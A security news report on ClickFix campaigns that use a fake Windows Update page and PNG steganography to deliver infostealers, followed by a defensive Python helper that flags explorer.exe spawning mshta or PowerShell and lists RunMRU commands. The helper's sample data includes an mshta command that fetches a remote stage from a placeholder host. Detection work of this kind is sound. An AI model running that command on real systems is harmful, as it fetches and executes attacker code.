Researchers: ClickFix variants use fake Windows Update page and steganography to deliver infostealers

Security researchers have observed variants of the ClickFix social‑engineering attack that present a full‑screen, realistic Windows Update animation in a browser to trick users into pasting and executing commands that install malware.

The lure instructs victims to press a specific key sequence that triggers JavaScript on the page to copy attacker commands to the clipboard and paste them into the Windows Run box or a command prompt. The technique builds on previously seen ClickFix “human verification” tricks and has been widely adopted by cybercriminals, researchers said.

According to a technical analysis, the multi‑stage attacks use the native mshta binary to run malicious JavaScript, then chain PowerShell and a .NET component called the Stego Loader to reconstruct a final payload that is hidden inside a PNG image and stored as an AES‑encrypted resource. Huntress researchers explain that the malicious code is encoded directly in pixel data and is reconstructed and decrypted in memory.

Huntress said the campaigns employ additional evasion and in‑memory execution techniques, including a “ctrampoline” tactic that calls thousands of empty functions and the use of the Donut tool to execute extracted shellcode and assemblies in memory. In samples recovered by the researchers, the final payloads included the LummaC2 and Rhadamanthys infostealers.

The Rhadamanthys variant that used the Windows Update lure was first spotted by researchers in October. Huntress reported that a law enforcement operation in mid‑November disrupted parts of the operators’ infrastructure and that payload delivery from the fake Windows Update domains stopped, though the domains remain active.

To mitigate this threat, Huntress recommended disabling the Windows Run box and monitoring for suspicious process chains such as explorer.exe spawning mshta.exe or PowerShell, and checking the RunMRU registry key during incident response.
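A small hunting helper for the two detections recommended above (explorer.exe spawning mshta.exe or PowerShell, and reviewing RunMRU during incident response). This is an added example, not Huntress's tooling; the Sysmon-style field names (ParentImage, Image, CommandLine) are an assumption, and the events and RunMRU values are constructed.

```python
"""Flag the ClickFix process chain and list recent Run-box commands from RunMRU."""
from __future__ import annotations

import re

# Children a Run-box paste in this campaign is expected to spawn under explorer.exe.
SUSPICIOUS_CHILDREN = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
# LOLBins whose presence in a Run-box command is worth escalating.
CMD_PATTERN = re.compile(r"\b(mshta|powershell|pwsh|cmd)(\.exe)?\b", re.IGNORECASE)


def flag_process_chains(events: list[dict]) -> list[dict]:
    """Return process-creation records where explorer.exe spawns a suspicious child.

    Each record is a flattened Sysmon Event ID 1 style dict (assumed field names):
    {"ParentImage": ..., "Image": ..., "CommandLine": ...}.
    """
    hits = []
    for ev in events:
        parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        child = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        if parent == "explorer.exe" and child in SUSPICIOUS_CHILDREN:
            hits.append(ev)
    return hits


def recent_run_commands(runmru: dict[str, str]) -> list[str]:
    """Order RunMRU commands most-recent-first.

    HKCU\\...\\Explorer\\RunMRU stores each command under a one-letter value name
    with a trailing "\\1" marker; the MRUList value is a string of those letters,
    most recent first.
    """
    cmds = []
    for letter in runmru.get("MRUList", ""):
        raw = runmru.get(letter)
        if raw is None:
            continue
        cmds.append(raw[:-2] if raw.endswith("\\1") else raw)
    return cmds


def suspicious_run_commands(runmru: dict[str, str]) -> list[str]:
    """Recent Run-box commands that invoke one of the LOLBins above."""
    return [c for c in recent_run_commands(runmru) if CMD_PATTERN.search(c)]


# Constructed sample telemetry and registry content, not real observations.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/stage1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File scheduled.ps1"},
]
SAMPLE_RUNMRU = {"MRUList": "cab", "a": "notepad\\1", "b": "calc\\1",
                 "c": "mshta https://example.invalid/stage1\\1"}
```

The svchost.exe-parented PowerShell in the sample is deliberately not flagged: the recommended signal is the explorer.exe parent, which is what a user-driven Run-box paste produces.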